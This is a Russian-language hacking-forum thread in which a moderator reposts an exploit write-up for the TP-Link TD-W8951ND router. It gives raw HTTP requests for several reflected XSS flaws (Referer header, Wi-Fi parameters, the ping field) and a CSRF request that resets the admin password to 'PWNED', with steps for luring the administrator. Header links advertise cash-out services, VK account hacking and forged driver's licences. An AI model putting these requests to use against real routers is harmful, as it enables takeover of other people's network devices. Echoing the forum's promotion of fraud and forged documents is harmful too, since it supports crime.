Обнал сервис MoneyTeam wwh
Взлом ВК
hacknet Продажа, изготовление водительских удостоверений (нового и старого образца)
hacknet

Взлом TP LINK роутера используя XSS-уязвимость

Тема в разделе "Безопасность", создана пользователем Marlb0r0, 10/9/15.

  1. TopicStarter Overlay
    Marlb0r0

    Marlb0r0 Ветеран Модератор Проверенный продавец

    Написать в ЛС
    Последняя активность:
    05.12.16
    Регистрация:
    6/1/15
    Сообщения:
    850
    Симпатии:
    264
    Депозит:
    [​IMG]

    EXPLOIT
    Первая — отраженная XSS-уязвимость для неавторизованных пользователей в поле Referer при обращении к несуществующим URL-адресам на роутере.
    Пример запроса:
    PHP:

    GET 
    /doesnotexist HTTP/1.1
    Host
    192.168.1.1
    Referer
    http://pwned"><script>alert("XSS")</script>
    Connectionkeep-alive
    Вторая — тоже отраженная XSS-уязвимость, но уже для авторизованных. Она нашлась в различных аргументах Wi-Fi-сети, поддерживаемой устройством. Ниже представлены примеры для сети с именем home_wlan_1:
    PHP:
    http://<IP>/Forms/home_wlan_1?wlanWEBFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    http://<IP>/Forms/home_wlan_1?AccessFlag=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    http://<IP>/Forms/home_wlan_1?wlan_APenable=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
    Следующая уязвимость также доступна только для авторизованных пользователей, но уже в одной из диагностических команд — ping — на странице /Forms/tools_test_1 в аргументе PingIPAddr. Пример запроса:
    PHP:
    POST /Forms/tools_test_1 HTTP/1.1
    Host
    : <IP>
    Refererhttp://<IP>/maintenance/tools_test.htm
    AuthorizationBasic blablabla==
    Connectionkeep-alive
    Content
    -Typeapplication/x-www-form-urlencoded
    Content
    -Length164
    Test_PVC
    =PVC0&PingIPAddr=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&pingfl ag=1&trace_open_fl ag=0&InfoDisplay=Ping+request+could+not+fi nd+host+
    Что касается CSRF-уязвимости, то она позволяет сбросить пароль администратора. Для атаки нужно создать HTML-страницу, которая отправит следующий запрос:
    PHP:
    http://<IP>/Forms/tools_admin_1?uiViewTools_Password=PWNED&uiViewTools_PasswordConfi rm=PWNED
    Чаще всего устройства этой компании имеют IP-адрес 192.168.1.1. Далее злоумышленник завлекает администратора устройства на его атакующую страницу. После чего паролем станет слово PWNED.

    TARGETS
    Протестировано на TP-Link TD-W8951ND Firmware 4.0.0 Build 120607Rel.30923.

    © cryptoworld
     
  2. Инфо. Бот Администратор

    Просьба ознакомиться с основными правилами проекта Читать.
    В сети полно мошенников, которые умело могут Вас развести и завладеть вашими денежными средствами.
    Для безопасности сделок рекомендуем пользоваться услугами Гарант сервиса.
     
Big.Bob